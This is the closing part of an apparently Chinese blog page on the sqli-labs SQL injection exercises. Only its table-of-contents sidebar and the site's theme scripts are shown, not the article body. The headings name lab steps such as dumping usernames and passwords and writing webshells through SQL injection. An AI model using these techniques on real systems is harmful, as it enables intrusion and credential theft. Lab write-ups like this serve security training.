href="#4-%E5%88%97%E5%87%BA%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text"> 4、列出所有数据库</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#5-%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93test%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E8%A1%A8"><span class="toc-text"> 5、列出 (数据库：test) 中所有的表</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#6-%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93test-%E8%A1%A8admin-%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E5%AD%97%E6%AE%B5"><span class="toc-text"> 6、列出（数据库：test 表：admin ）中所有的字段</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#7-%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93test-%E8%A1%A8admin-%E4%B8%AD%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="toc-text"> 7、列出（数据库：test 表：admin ）中的数据</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sqli-labs-1"><span class="toc-text"> sqli-labs-1</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%A8order-by%E7%8C%9C%E8%A7%A3%E5%88%97%E6%95%B0"><span class="toc-text"> 用 order by 猜解列数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%98%BE%E7%A4%BA%E5%9B%9E%E6%98%BE%E4%BD%8D"><span class="toc-text"> 显示回显位</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%88%86%E6%95%B0%E6%8D%AE"><span class="toc-text"> 爆数据</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E8%A1%A8%E5%90%8D"><span class="toc-text"> 查询表名</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97%E6%98%8E"><span class="toc-text"> 查询列明</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE"><span class="toc-text"> 查询数据</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-2"><span class="toc-text"> sqli-labs-2</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97%E6%95%B0"><span class="toc-text"> 查询列数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9A%E5%93%AA%E4%B8%AA%E5%AD%97%E6%AE%B5%E6%9C%89%E5%9B%9E%E6%98%BE"><span class="toc-text"> 确定哪个字段有回显</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9A%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0"><span class="toc-text"> 确定当前数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BE%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D"><span class="toc-text"> 得出数据库所有表名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BE%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E6%89%80%E6%9C%89%E5%88%97%E5%90%8D"><span class="toc-text"> 得出数据库所有列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BE%97%E5%87%BAusers%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89username%E5%92%8Cpassword"><span class="toc-text"> 得出 users 表中的所有 username 和 password</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell"><span class="toc-text"> 写入 webshell</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-3"><span class="toc-text"> sqli-labs-3</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-2"><span class="toc-text"> 初步判断</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%8B%E6%98%AF%E5%90%A6%E5%9B%9E%E6%98%BE"><span class="toc-text"> 判断一下是否回显</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E9%9C%80%E8%A6%81%E9%97%AD%E5%90%88%E4%BB%80%E4%B9%88%E7%AC%A6%E5%8F%B7"><span class="toc-text"> 判断需要闭合什么符号</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%98%AF%E4%BB%80%E4%B9%88%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text"> 判断是什么型注入</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%88%97%E6%95%B0"><span class="toc-text"> 获取列数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D"><span class="toc-text"> 获取所有表名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%ADusers%E8%A1%A8%E7%9A%84%E6%89%80%E6%9C%89%E5%88%97%E5%90%8D"><span class="toc-text"> 获取数据库中 users 表的所有列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%88%86%E5%87%BAusers%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89username%E5%92%8Cpassword"><span class="toc-text"> 爆出 users 表中的所有 username 和 password</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshelll"><span class="toc-text"> 写入 webshelll</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-4"><span class="toc-text"> sqli-labs-4</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text"> 前言</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-3"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E5%88%97%E6%95%B0"><span class="toc-text"> 判断列数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E5%9B%9E%E6%98%BE%E5%AD%97%E6%AE%B5"><span class="toc-text"> 判断回显字段</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0-2"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="toc-text"> 获取所有的数据</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-5"><span class="toc-text"> sqli-labs-5</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E6%B6%89%E5%8F%8A%E5%86%85%E5%AE%B9"><span class="toc-text"> 本关涉及内容</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#updatexml"><span class="toc-text"> updatexml()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#concat"><span class="toc-text"> concat()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#substr"><span class="toc-text"> substr()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#select-distinct"><span class="toc-text"> select distinct()</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-4"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0-3"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D-2"><span class="toc-text"> 获取所有表名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96users%E6%89%80%E6%9C%89%E5%88%97%E5%90%8D"><span class="toc-text"> 获取 users 所有列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89username%E5%92%8Cpassword"><span class="toc-text"> 获取所有 username 和 password</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell-2"><span class="toc-text"> 写入 webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell%E5%BD%92%E7%BA%B3"><span class="toc-text"> 写入 webshell 归纳</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-union-select%E5%86%99%E5%85%A5"><span class="toc-text"> 1、union select 写入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#lines-terminated-by%E5%86%99%E5%85%A5"><span class="toc-text"> Lines terminated by 写入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-lines-starting-by%E5%86%99%E5%85%A5"><span class="toc-text"> 3、lines starting by 写入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-fields-terminated-by%E5%86%99%E5%85%A5"><span class="toc-text"> 4、fields terminated by 写入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#5-columns-terminated-by%E5%86%99%E5%85%A5"><span class="toc-text"> 5、COLUMNS terminated by 写入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#6-%E5%88%A9%E7%94%A8log%E5%86%99%E5%85%A5"><span class="toc-text"> 6、利用 log 写入</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-6"><span class="toc-text"> sqli-labs-6</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-5"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0-4"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D-3"><span class="toc-text"> 获取所有表名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96users%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E5%88%97%E5%90%8D"><span class="toc-text"> 获取 users 表中的所有列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96users%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89username%E5%92%8Cpassword"><span class="toc-text"> 获取 users 表中的所有 username 和 password</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell-3"><span class="toc-text"> 写入 webshell</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-7"><span class="toc-text"> sqli-labs-7</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-6"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0-5"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D-4"><span class="toc-text"> 获取所有表名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96users%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E5%88%97%E5%90%8D-2"><span class="toc-text"> 获取 users 表中的所有列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96users%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89username%E5%92%8Cpassword-2"><span class="toc-text"> 获取 users 表中的所有 username 和 password</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell-4"><span class="toc-text"> 写入 webshell</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-8"><span class="toc-text"> sqli-labs-8</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E6%AD%A5%E5%88%A4%E6%96%AD-7"><span class="toc-text"> 初步判断</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0-6"><span class="toc-text"> 获取数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E4%BF%A1%E6%81%AF"><span class="toc-text"> 获取所有信息</span></a></li></ol></li></ol></li></ol></div><div class="widget-footer">

<a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 12c0-4.714 0-7.071 1.464-8.536C4.93 2 7.286 2 12 2c4.714 0 7.071 0 8.535 1.464C22 4.93 22 7.286 22 12c0 4.714 0 7.071-1.465 8.535C19.072 22 16.714 22 12 22s-7.071 0-8.536-1.465C2 19.072 2 16.714 2 12Z"/><path stroke-linecap="round" stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/></g></svg><span>回到顶部</span></a></div></widget>
</div></aside><div class='float-panel blur'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">
<script type="text/javascript">
  const ctx = {
    date_suffix: {
      just: `刚刚`,
      min: `分钟前`,
      hour: `小时前`,
      day: `天前`,
    },
    root : `/`,
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
  };
  const deps = {
    jquery: `https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js`,
    marked: `https://cdn.jsdelivr.net/npm/marked@13.0.1/lib/marked.umd.min.js`
  }
  

</script>

<script type="text/javascript">
  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')){
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },
    
    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      let retryTimes = 3;
      utils.onLoading(el);
      function req() {
        return new Promise((resolve, reject) => {
          let status = 0; // 0 等待 1 完成 2 超时
          let timer = setTimeout(() => {
            if (status === 0) {
              status = 2;
              timer = null;
              reject('请求超时');
              if (retryTimes == 0) {
                onFailure();
              }
            }
          }, 5000);
          fetch(url).then(function(response) {
            if (status !== 2) {
              clearTimeout(timer);
              resolve(response);
              timer = null;
              status = 1;
            }
            if (response.ok) {
              return response.json();
            }
            throw new Error('Network response was not ok.');
          }).then(function(data) {
            retryTimes = 0;
            utils.onLoadSuccess(el);
            callback(data);
          }).catch(function(error) {
            if (retryTimes > 0) {
              retryTimes -= 1;
              setTimeout(() => {
                req();
              }, 5000);
            } else {
              utils.onLoadFailure(el);
              onFailure();
            }
          });
        });
      }
      req();
    },
  };
</script>

<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>


<!-- required -->
<script src="/js/main.js?v=1.29.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    applyThemeToGiscus(theme)
  }

  const applyThemeToGiscus = (theme) => {
    theme = theme === 'auto' ? 'preferred_color_scheme' : theme

    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)

    const messages = {
      light: `切换到浅色模式`,
      dark: `切换到深色模式`,
      auto: `切换到跟随系统配色`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    }
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://cdn.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@19.1.3/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });
</script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error)';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const els = document.getElementsByClassName('ds-memos');
    if (els != undefined && els.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
